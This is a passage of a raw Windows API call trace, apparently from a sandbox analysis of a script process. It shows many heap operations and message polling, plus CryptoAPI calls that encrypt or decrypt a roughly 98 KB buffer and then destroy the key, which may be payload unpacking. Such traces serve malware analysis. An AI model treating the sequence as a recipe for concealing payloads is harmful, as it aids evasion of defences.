0x9c2788 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0167.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0167.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0167.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.907] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0167.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0167.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.908] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.908] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0167.909] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c27a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0167.909] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0167.910] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.911] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.911] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0167.911] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0167.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.912] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.912] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0167.912] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.912] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.912] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0167.912] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.912] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.912] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0167.912] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.912] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.912] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.913] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.913] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.913] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.914] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1828a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x18290) returned 1 [0167.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.914] CharLowerBuffW (in: lpsz="byte[98961]", cchLength=0xb | out: lpsz="byte[98961]") returned 0xb [0167.914] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.915] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.915] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.915] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0167.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.915] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa602a0*, pdwDataLen=0x87e820*=0x1828a, dwBufLen=0x18290 | out: pbData=0xa602a0*, pdwDataLen=0x87e820*=0x18290) returned 1 [0167.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.916] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.916] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.916] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.916] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.916] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0167.916] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.916] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.917] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0167.917] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.917] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0167.917] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.923] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.923] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.923] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.928] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.928] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.928] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0167.928] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.928] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.928] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0167.928] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.928] CryptDestroyKey (hKey=0x90af98) returned 1 [0167.928] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.928] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0167.928] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.928] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0167.928] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.928] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0167.928] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0167.928] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0167.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.929] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0167.929] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0167.929] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) 